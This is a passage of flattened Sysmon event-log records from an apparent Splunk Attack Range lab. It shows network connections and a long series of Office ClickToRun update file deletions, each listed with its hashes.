Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52498-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x800000000000000049758Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:22.486{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com59554-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000069960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AUDIOSEARCHLTS.DLLMD5=7A5FF33C71C82B3971526357BA22BF04,SHA256=6043B553B78621D12668338CB3736464503DBE9385D6E6AC18BE52A5BA4177C5,IMPHASH=E9965067729BB92B8D29191962E091E6truetrue 23542300x800000000000000069959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\appshvw.dllMD5=6FDF07F7814206A09F175BBA1FAD3F2F,SHA256=73BEAED72E4344D6CF65CAEEA2E818DACCAC1616D931AEFD8F337F497CAFC2FD,IMPHASH=3ACA6110E9E6B421F81A32FCA9CB5F43truetrue 23542300x800000000000000069958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\appshcom.dllMD5=CD72E5D0B45FFFEBBF94E77AA0AB6D8E,SHA256=E2E5ACE92C995D0217463B112F04940259623FC52A4194A28E0B5A13BFE1AB86,IMPHASH=ACA922888CA7C3BC306B7A0D22EBAD55truetrue 23542300x800000000000000069957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\appsharingmediaprovider.dllMD5=75075B97F51FB817529024EBCF772137,SHA256=6EED3E687856EF0DEE877769C7A51F602DC67EABF1C0CFD1E2C45390230E3264,IMPHASH=E1E09F247E95198C16FF9B25A202ED94truetrue 23542300x800000000000000069956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AppSharingHookController64.exeMD5=4F03AFF72375EC12A66D6ED426126368,SHA256=0A9228CAD18B594AF0A1A360F26439634C1507A9C2AA24A5E48DFD8F5916D642,IMPHASH=CE6E9E1487CD95EFFB7C675C21CDD99Ftruetrue 23542300x800000000000000069955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AppSharingChromeHook64.dllMD5=578A836927C2078E0C6C4F31F8A70D1B,SHA256=747B5BC5D38C160F3E8F196821510E607AAC9D756CF52F2EEB5F2D0B22F29630,IMPHASH=2C2D2E7E6BBDC260F2156ED40E2F6D65truetrue 23542300x800000000000000069954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Appshapi.dllMD5=221FDED1E960DA278351BF42A751AC4B,SHA256=E6C1F4909AE0897F1C3F1F037AE46632B883378043249323D6C677279B842A18,IMPHASH=E5DF7F1018FB0168D3BC4F790067CCF8truetrue 23542300x800000000000000069953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-utility-l1-1-0.dllMD5=F440DC5623419E013D07DD1FCD197156,SHA256=BBA068F29609630E8C6547F1E9219E11077426C4F1E4A93B712BFBA11A149358,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-time-l1-1-0.dllMD5=05AF3F787A38ED1974FF3BDA3D752E69,SHA256=F4163CBC464A82FCE47442447351265A287561C8D64ECC2F2F97F5E73BCB4347,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-string-l1-1-0.dllMD5=3A96F417129D6E26232DC64E8FEE89A0,SHA256=01E3C0AA24CE9F8D62753702DF5D7A827C390AF5E2B76D1F1A5B96C777FD1A4E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-stdio-l1-1-0.dllMD5=53E23E326C11191A57DDF7ADA5AA3C17,SHA256=293C76A26FBC0C86DCF5906DD9D9DDC77A5609EA8C191E88BDC907C03B80A3A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-runtime-l1-1-0.dllMD5=C25321FE3A7244736383842A7C2C199F,SHA256=BF55134F17B93D8AC4D8159A952BEE17CB0C925F5256AA7F747C13E5F2D00661,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-process-l1-1-0.dllMD5=E18FD20E089CB2C2C58556575828BE36,SHA256=B06B2D8C944BFF73BD5A4AAD1CAD6A4D724633E7BD6C6B9E236E35A99B1D35F2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-private-l1-1-0.dllMD5=B4BE272187CB85E719DFB5BF48BB9B1B,SHA256=CCAF41E616B9A872D35C8083CBF8FDC14371FA3EF159FE699514643C26A4EBF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-multibyte-l1-1-0.dllMD5=FF4DE9CE85C4B01312DF6E3CDD81B0FF,SHA256=D7E676B9F1E162957D0549AB0B91E2CD754643490B0654BF9A86AA1E77CB3C37,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-math-l1-1-0.dllMD5=877C5FF146078466FF4370F3C0F02100,SHA256=9B05A43FDC185497E8C2CEA3C6B9EB0D74327BD70913A298A6E8AF64514190E8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-locale-l1-1-0.dllMD5=0D50A16C2B3EC10B4D4E80FFEB0C1074,SHA256=FAB41A942F623590402E4150A29D0F6F918EE096DBA1E8B320ADE3EC286C7475,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-heap-l1-1-0.dllMD5=5D409D47F9AEBD6015F7C71D526028C3,SHA256=7050043B0362C928AA63DD7800E5B123C775425EBA21A5C57CBC052EBC1B0BA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-filesystem-l1-1-0.dllMD5=D76F73BE5B6A2B5E2FA47BC39ECCDFE5,SHA256=6C86E40C956EB6A77313FA8DD9C46579C5421FA890043F724C004A66796D37A6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-environment-l1-1-0.dllMD5=FE93C3825A95B48C27775664DC54CAE4,SHA256=C4ED8F65C5A0DBF325482A69AB9F8CBD8C97D6120B87CE90AC4CBA54AC7D377A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-convert-l1-1-0.dllMD5=AFC20D2EF1F6042F34006D01BFE82777,SHA256=CD5256B2FB46DEAA440950E4A68466B2B0FF61F28888383094182561738D10A9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-conio-l1-1-0.dllMD5=E3D0F4E97F07033C1FEAF72362BBB367,SHA256=3067981026FAD83882F211BFE32210CE17F89C6A15916C13E62069E00D5A19E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-xstate-l2-1-0.dllMD5=42DC903598FF9D2BFB92D3F1F1563A92,SHA256=583BE047AA83CCE2E8950F5F550DABC5F7CB5957860316E3F409BFAFB10B963C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-timezone-l1-1-0.dllMD5=BDD63EA2508C27B43E6D52B10DA16915,SHA256=7D4252AB1B79C5801B58A08CE16EFD3B30D8235733028E5823F3709BD0A98BCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-synch-l1-2-0.dllMD5=B9BC664A451424342A73A8B12918F88D,SHA256=0C5C4DFEA72595FB7AE410F8FA8DA983B53A83CE81AEA144FA20CAB613E641B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-processthreads-l1-1-1.dllMD5=247061D7C5542286AEDDADE76897F404,SHA256=CCB974C24DDFA7446278CA55FC8B236D0605D2CAAF273DB8390D1813FC70CD5B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-localization-l1-2-0.dllMD5=6B4F2CA3EFCEB2C21E93F92CDC150A9D,SHA256=B39A515B9E48FC6589703D45E14DCEA2273A02D7FA6F2E1D17985C0228D32564,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-file-l2-1-0.dllMD5=ADB3471F89E47CD93B6854D629906809,SHA256=355633A84DB0816AB6A340A086FB41C65854C313BD08D427A17389C42A1E5B69,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-file-l1-2-0.dllMD5=19DF2B0F78DC3D8C470E836BAE85E1FF,SHA256=BD9E07BBC62CE82DBC30C23069A17FBFA17F1C26A9C19E50FE754D494E6CD0B1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\amRenderer.jsMD5=071F9D58F77DE66941898A0786319635,SHA256=B48AA5D9560831AE97D985B11CA9B31E74BB334239E880B875792D274E88A3B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AdeModule.dllMD5=562311B43987780914D2628890DD55E8,SHA256=50AEE47D8D0DDDCAE3E3E201B4955CD10004FA93CBA278962918750AB01E1829,IMPHASH=EC49BE61653CFE88D16F0DF1C2F5976Ftruetrue 23542300x800000000000000069929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACEDAO.DLLMD5=2072FE4A41413E3FFCFBCEEF6FF24EFD,SHA256=41ECBDB4204DADC71DFF1EAE53E7844B656A175488EC0EF8D64BC5275FE118FC,IMPHASH=E56C0256A44C77C9B3055B5C2C510CD9truetrue 23542300x800000000000000069928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ.DLLMD5=9F9B6FB3712EFFA73CE86BEBFEFDD603,SHA256=6B23EFEF9323F070EEAABD184847CFF144E1485099CC239F806AC48CCD6C649E,IMPHASH=DF43FD8FFDF897DC7B93F5DE02B02307truetrue 23542300x800000000000000069927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCICONS.EXEMD5=DED49B1D02237346285FBB0B65847AA6,SHA256=419A439B4CEE44333EA80E3406FB75E432ADC3B4F7507F9CDE0BB9BA910E1206,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\punctuation.jsonMD5=3113F73B77492D7E86DB4E6B8638B7B2,SHA256=214662B9C49F6ED82B293833A233F257BA96B41414B0C9764C15D94DF41961E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\ime.jsonMD5=29AA3B4E788AC5EF14A94F85EB16BB56,SHA256=86D52FB2D1976A02A87225DABC3D20EFCACA8BF71D12466CCC80670668725ED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\filter.binMD5=B8D2FA1C04D937AE3398B722478BE8D2,SHA256=A889A6BE32E94D31E08D9FF67F9E13B2256A0577AB3E843352F746C72E9D3C30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\en_US_word_c.lm1MD5=41B2DD68B659A7C8B9667DAEA745B0A5,SHA256=31FF25C540D725382491D2DC5370258780EAD91269F40C878D722FD5C05DE03C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\en_US.lmMD5=202477472E62E0C470F98C162C83FCE1,SHA256=E8109D80D89DDAEA77562E95FDD5A617D35EBAE7ECAC65D7966ED3CEF087A0D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\emoji_bg_c.lm2MD5=15433B04251E3545F7D82AC4BAF4EEAE,SHA256=FF2B05210E5A3623B5079D71B504135BE72D78014537C1A081E7D889D59ED9F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\charactermap.jsonMD5=3C0ECCB14E50793BD9AC0C2E4CA5ADEB,SHA256=6D0FC6920706A66CA6E9E76B25DF0FF8A545BDCB58A5BEC2E6380C6A37EA14E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\TextInputIntelligence\en-us\.configMD5=D9D571F66AC330E9405D1C143364E9A0,SHA256=5C02BF019B1B7CF6F262A41126D74E6CE0CB08CF0366507239351D9359B1956F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SkypeSrv\SKYPESERVER.TLBMD5=4F6ADE27E73C4A81ABBA91F556CAEC2C,SHA256=535446BB06ECF2B656F17520632D6AEAC046A92E143F6289E51E4DD5584D1DB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 